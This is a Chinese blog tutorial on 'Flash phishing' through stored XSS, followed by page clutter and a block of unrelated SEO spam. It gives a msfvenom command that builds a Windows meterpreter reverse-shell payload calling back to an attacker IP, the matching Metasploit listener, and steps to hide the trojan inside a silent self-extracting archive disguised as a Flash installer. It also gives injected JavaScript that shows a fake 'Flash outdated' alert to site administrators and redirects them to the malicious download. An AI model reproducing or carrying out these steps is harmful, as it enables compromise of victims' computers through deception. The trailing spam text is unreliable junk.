Xss——Flash钓鱼

使用msfvenom

进入kali,记得做免杀(这里就不演示免杀了)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.133.142 lport=1122 -f exe > test.exe

进入msfconsole,监听

handler -H 192.168.133.142 -P 1122 -p windows/meterpreter/reverse_tcp

伪造flash下载程序

1.下载winrar
2.将木马和flash下载包放到一个文件夹里
在这里插入图片描述
3.将这两个exe文件全选,右击添加到压缩文件
在这里插入图片描述
4.选中创建自解压格式压缩文件
在这里插入图片描述
5.选择高级后点击自解压选项
在这里插入图片描述
6.解压路径选择有权限的路径(如果根据我的写的话,将gallop改为自己的用户id即可)
在这里插入图片描述
7.选择设置,在红框里为解压路径后加两个exe程序的id
在这里插入图片描述
8.选择模式,点击全部隐藏
在这里插入图片描述
9.选择更新,点击覆盖所有文件
在这里插入图片描述
10.两次确定后得到一个压缩后的exe文件
在这里插入图片描述
11.将这个压缩后的exe移到桌面,改名为flash的名字
在这里插入图片描述

伪造flash页面

1.谷歌浏览器打开flash官网,根据图片网页另存为桌面文件夹,将html命名为index.html
在这里插入图片描述
在这里插入图片描述

2.将原来的href改为本地ip+flash文件名
在这里插入图片描述
3.将保存的两个文件及压缩后的flash文件放到本机的phpstudy根目录
在这里插入图片描述

Xss平台设置

1.进入一个xss,平台链接: https://xss.pt/xss.php.
2.创建一个模块,模块名称为flash钓鱼,代码中的ip改为本机ip
在这里插入图片描述

window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window.location.href="http://10.163.197.142/";

3.点击创建,项目名称设置为diaoyu,点击下一步
在这里插入图片描述
4.选择更改创建的flash钓鱼,点击下一步
在这里插入图片描述
5.根据自己情况选择代码
在这里插入图片描述

开始flash钓鱼

1.进入留言板,插入存在xss的地方,点击发表
在这里插入图片描述
2.如果管理员进入后台,点击留言,会弹出一个弹窗,这里出现乱码了(编码问题)
在这里插入图片描述
3.管理员点击确定后,就会出现你刚刚做的网页,点击下载就会下载flash压缩后的exe文件
在这里插入图片描述
4.将下载后的文件放到虚拟机里,双击,kali就会收到监听
在这里插入图片描述

gallopsec
关注 关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
xss特殊字符拦截与过滤
04-01
滤除content中的危险 HTML 代码, 主要是脚本代码, 滚动字幕代码以及脚本事件处理代码
红队钓鱼技术之Flash网页钓鱼
xf555er的博客
08-07 399
Flash钓鱼攻击是一种网络攻击手段,旨在欺骗用户访问伪造的Flash更新页面,并诱使他们下载并安装恶意软件。这种攻击通常利用用户对Flash更新的需求,以及对合法更新网站的信任。攻击者通常会模仿Adobe Flash Player的官方更新页面,以提高诱骗成功率。
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2698
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
Flash XSS漏洞快速上手
weixin_50464560的博客
07-29 954
0x01 Flash XSS xss一是指执行恶意js,那么为什么说flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call,htmlText,loadMovie等等 0x02 ExternalInterface.call举例 AS中ExternalInterface类是用来和js通信的,调用方法是用来调用js函数的,函数原型
Flash钓鱼->CS上线(免杀过火绒、360等)
weixin_54227009的博客
05-13 9310
这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了。这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标。3、将免杀的exe跟生成的PayloadFile进行压缩。5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可。执行路径为:C:\Windows\Temp\Flash.exe。3.4、高级->模式->静默模式->全部隐藏。这里我把解压路径给改成了:C:\Windows\Temp。3.2、 高级->常规->解压路径。
Flash钓鱼
热门推荐
weixin_45794666的博客
02-22 1万+
Flash钓鱼 首先将写好的flash.js放在自己的服务器上 var s1 = document.createElement('script'); s1.setAttribute('type','text/javascript'); s1.setAttribute('src','//cdn.bootcdn.net/ajax/libs/jquery/2.0.0/jquery.min.js'); var head = document.getElementsByTagName('head')[0]; head
Flash钓鱼讲解
good good study
05-31 982
flash钓鱼
Flash XSS 学习整理
baynk的博客
11-24 1038
0x00 Flash XSS 本来想放弃的,问了大佬,还是说可以研究下。。。所以硬着头皮来弄了。 什么是flash xssxss一是指执行恶意js,那flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成flash xss。 常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface....
xss-flash钓鱼配合msf捆绑上线
weixin_43225966的博客
04-21 924
xss-flash钓鱼配合msf捆绑上线
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
flash动画小猫钓鱼
03-31
一个动画一个动画一个动画一个动画一个动画
Flash XSS漏洞挖掘1
08-03
1. Introduction 2. Vulnerability Analysis Requirement 3. Case Study In Real Worl
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 7039
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2281
渗透测试-xss钓鱼测试和xss盲打
xxs-flash-钓鱼
qq_38618396的博客
12-27 736
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
xss漏洞钓鱼
rescure的博客
01-21 1018
利用xss漏洞钓鱼 简要:由于资金问题,没有自己的网站,故在此用xss平台和dvwa实现xss反射型钓鱼操作 NO.1 正常进入dvwa,模式选择为low,使用xss(refelect) 进入xss平台,选择创建项目,在此为dvwa,创建之后,选择功能默认即可 ,随后平台会生成自己的js代码 NO.2 接下来,复制生成的js代码,粘贴至xss漏洞处(具体情况需要自己分析是什么类型的) 接下来就是copy大法了 ...
简单的Flash钓鱼页面跳转
Naiisii的博客
01-12 442
环境win7虚拟机 本机 过程 在win7虚拟机内: PHP打开js文件,将href改为虚拟机IP的网页 回到本机,在www目录下新建一个html PHP打开html文件,插入跳转到虚拟机网页的XSS 访问本机的html网页 会发现跳转到了虚拟机IP ...
pikachu靶场xss钓鱼攻击
最新发布
09-29
pikachu靶场中的XSS钓鱼攻击是通过构造钓鱼页面来实现的。攻击者将发送Basic认证的认证框修改为指向自己的服务器地址,并在钓鱼页面中插入恶意的代码。当用户访问被篡改的页面时,恶意代码将被执行,从而导致攻击成功。 具体步骤如下: 1. 攻击者需要构造一个钓鱼页面,将发送Basic认证的认证框修改为指向自己的服务器地址。 2. 钓鱼页面中插入恶意代码,以便在用户访问该页面时进行攻击。 3. 当用户访问被篡改的页面时,恶意代码将被执行,从而实现XSS钓鱼攻击。 请注意,XSS钓鱼攻击是一种常见的网络攻击方式,攻击者利用网页中存在的安全漏洞,通过注入恶意代码,从而获取用户的敏感信息或进行其他恶意行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • ce修改植物大战僵尸之植物无冷却 9298
  • ce修改植物大战僵尸之修改阳光值 4782
  • Red Hat Enterprise Linux 6 忘记密码怎么办 2674
  • ms17-010(永恒之蓝)漏洞利用 1089
  • ms10-018漏洞利用 899

最新评论

  • ce修改植物大战僵尸之植物无冷却

    liwkk: 关掉再打开程序的话地址会变,无冷却脚本似乎用不了

  • ce修改植物大战僵尸之植物无冷却

    被冬眠的熊: 谢谢大佬,万分感谢

  • ce修改植物大战僵尸之植物无冷却

    gallopsec: sorry,因为汇编很久没看了,而且当初也是自己自学的,为什么选择这里就需要理解汇编代码了,本来这个mov应该是到有cd的代码部分,然后给空的话占用指令时间但是不会跳转了,相当于执行cd的代码没有收到数据,因此冷却为空了

  • ce修改植物大战僵尸之植物无冷却

    被冬眠的熊: 按照这个方法直接就全部无CD了,真好,感谢大佬倾情奉献,不过还有个问题想请教下,为什么要选择mov eax,【edi+24】这个有什么要求吗?还是熟能生巧,这个是不是涉及到汇编代码了。新手请教,还望指点一二

  • ce修改植物大战僵尸之植物无冷却

    chary3: 你好我找不到空指令替换

大家在看

  • 一千题,No.0074(爱丁顿数) 21
  • Go实战全家桶之十四:自研业务平台goplatformserver,源于通用web工具生成web框架
  • linux /etc/fstab 挂载配置错误处理方法
  • 5.3.2_2 二叉树的线索化
  • SSA-CNN-LSTM多输入分类|樽海鞘算法-卷积-长短期神经网络|Matlab

最新文章

  • xray和rad或burp联动
  • ms10-018漏洞利用
  • ms08-067漏洞利用
2023年1篇
2022年8篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gallopsec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

两个鬼故事公司起名在哪里核名清风明月本无价下一句起一个好听的游戏名字李姓好听男孩起名给宝宝起个名字 姓李西安事变简介甜筒冰淇淋加盟花牛在草地里什么仿写句子起名网我是一个懂事的孩子古诗词大全蒹葭赏析孙姓双胞胎男孩起名大全龙女宝宝起名虎年起名宜用名字秋天生的女孩起什么名字好呀给孩子起名字牛宝宝方姓氏起名字男孩名字自由女神像是哪个国家送给美国的礼物网游之堕落天使下载西安世纪金花最大货轮性瘾症吹毛求疵山东电视台少儿频道河南电视台法制频道王字男孩起名字大全以土起名字玄幻小说起名装潢公司起名字免费少年生前被连续抽血16次?多部门介入两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”淀粉肠小王子日销售额涨超10倍高中生被打伤下体休学 邯郸通报单亲妈妈陷入热恋 14岁儿子报警何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言张家界的山上“长”满了韩国人?男孩8年未见母亲被告知被遗忘中国拥有亿元资产的家庭达13.3万户19岁小伙救下5人后溺亡 多方发声315晚会后胖东来又人满为患了张立群任西安交通大学校长“重生之我在北大当嫡校长”男子被猫抓伤后确诊“猫抓病”测试车高速逃费 小米:已补缴周杰伦一审败诉网易网友洛杉矶偶遇贾玲今日春分倪萍分享减重40斤方法七年后宇文玥被薅头发捞上岸许家印被限制高消费萧美琴窜访捷克 外交部回应联合利华开始重组专访95后高颜值猪保姆胖东来员工每周单休无小长假男子被流浪猫绊倒 投喂者赔24万小米汽车超级工厂正式揭幕黑马情侣提车了西双版纳热带植物园回应蜉蝣大爆发当地回应沈阳致3死车祸车主疑毒驾恒大被罚41.75亿到底怎么缴妈妈回应孩子在校撞护栏坠楼外国人感慨凌晨的中国很安全杨倩无缘巴黎奥运校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变王树国卸任西安交大校长 师生送别手机成瘾是影响睡眠质量重要因素国产伟哥去年销售近13亿阿根廷将发行1万与2万面值的纸币兔狲“狲大娘”因病死亡遭遇山火的松茸之乡“开封王婆”爆火:促成四五十对奥巴马现身唐宁街 黑色着装引猜测考生莫言也上北大硕士复试名单了德国打算提及普京时仅用姓名天水麻辣烫把捣辣椒大爷累坏了

两个鬼故事 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化